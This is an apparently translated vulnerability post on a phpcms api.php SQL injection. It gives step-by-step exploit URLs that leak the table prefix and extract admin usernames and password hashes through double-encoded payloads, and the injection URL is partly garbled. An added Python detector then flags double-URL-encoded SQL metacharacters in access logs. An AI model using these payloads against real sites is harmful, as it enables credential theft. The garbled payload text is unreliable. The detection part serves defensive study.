I won't say much about the cause of the vulnerability. If you are interested in phpcms's api.php file, you can dig up more phpcms holes.
Main exploitation process:
Step 1: register a user
http://www.wooyun.in/index.php?m=member&c=index&a=register&siteid=1
Step 2: access the API file to expose the table prefix (the error message leaks it). The default table prefix is v9.
http://www.wooyun.in/api.php?op=add_favorite&url=wooyun.in&title=%2527
Step 3: dump the user password (the red font below is the table prefix, which must be changed to match the one obtained in step 2)
Http://www.wooyun.in/api.php? Op = add_favorite & url = v9 & title = % 2527% 2520and % 2520% 2528 select % 25201% 2520 from % 2528 select % 2520 count % 2528% 252a % 2529% Cconcat % 252 2528% select % 2528 2528 select % 2520% 2528 select % 2520 concat % 25280 x 23% 252 Ccast % 2528 concat % 2528 username % 252C0x3a % 252 Cpassword % 252C0x3a % 252 Cencrypt % 2529% 2520as % 2520 char % 2529% 252C0x23% 2529% 2520 from % 2520v9_admin % 2520 LIMIT % 25200% 252C1% 2529% 2529% from % 2520information_schema.tables % 2520 limit % 2520 252C1% 25200% Cfloor % 2529% rand % 252 252a2% 2528 2529x % 2520 from % 2520information_schema.tables % 2520 group % 2520by % 2520x % 2529a % 2529% 2520and % 2520% 25271% 2527% 253D % 25271
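The payloads above only work because `%2527` becomes `%27` after the web server's decode and `'` after a second decode inside the application, so the quote slips past any escaping done on the once-decoded value. A defender can key on exactly that: a normal client encodes once, so a SQL metacharacter that only surfaces after a second decode is a strong signal. The following detection script is an added example, not code from the original post; it assumes Apache/Nginx-style access-log lines and uses constructed sample lines, including the table-prefix probe from step 2.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# SQL metacharacters / keywords worth hiding behind a second encoding layer
SQL_META = re.compile(r"'|\"|--|\bselect\b|\bunion\b|information_schema", re.IGNORECASE)

def decode_rounds(value, max_rounds=3):
    """URL-decode repeatedly until nothing changes. Index 0 is the input as given."""
    forms = [value]
    for _ in range(max_rounds):
        nxt = unquote(forms[-1])
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    return forms

def suspicious_params(url):
    """Return [(param, rounds, decoded)] for query params whose SQL metacharacters
    surface only after a second URL-decode, i.e. were double-encoded like %2527.
    parse_qsl() performs the first decode, as the web server would."""
    hits = []
    for name, once in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        forms = decode_rounds(once)          # forms[0] is the once-decoded value
        for extra, form in enumerate(forms):
            if SQL_META.search(form):
                if extra > 0:                # needed extra decoding: flag it
                    hits.append((name, extra + 1, form))
                break                        # single-encoded hit: ordinary WAF territory
    return hits

def scan_access_log(lines):
    """Apply suspicious_params() to the request URL of each combined-format log line."""
    req = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = req.search(line)
        if m:
            for hit in suspicious_params("http://h" + m.group(1)):
                alerts.append((lineno,) + hit)
    return alerts

# Constructed sample log lines (not real traffic): benign, the step-2 prefix probe,
# and a double-encoded quote followed by a keyword.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /api.php?op=add_favorite&url=site&title=Hello%20World HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /api.php?op=add_favorite&url=wooyun.in&title=%2527 HTTP/1.1" 200 734',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2529 HTTP/1.1" 500 0',
]
```

`scan_access_log(SAMPLE_LOG)` flags lines 2 and 3 and leaves the benign request alone; the same rule applies to the fix, which is to never URL-decode a parameter again after it has been escaped for the database.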
Address: http://www.wooyun.in/post/14.html